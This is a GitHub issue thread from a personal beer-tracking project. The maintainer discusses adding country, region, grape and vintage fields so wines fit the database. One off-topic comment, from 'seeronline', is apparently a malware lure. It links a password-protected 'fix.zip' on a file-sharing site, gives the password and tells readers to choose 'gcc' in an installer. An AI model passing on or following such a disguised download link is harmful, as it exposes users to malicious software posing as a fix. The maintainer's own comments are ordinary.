### ISSUE TITLE
Wine

### ISSUE THREAD

**Issue by heikkilevanto** [heikkilevanto/beertracker#371]
Wines don't really fit in the system. Add more fields:

- Country / Region
- Year

Then the Style field can contain either grapes or things like "Grand Reserve".

Actually, country would apply to beers as well. Now it goes into the substyle, which is not quite right.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by heikkilevanto** [comment]
Added more fields in the database layout. 

Should split the wine styles into country, region, grapes, and styles. Needs a lot of heuristics

**Comment by heikkilevanto** [comment]
I think I have the import done, splitting country, region, grapes, and vintage in their own fields.

May need to do the same for inputting new records, unless I get the new input UI done before I switch over. See #384

**Comment by heikkilevanto** [comment]
Good enough for now
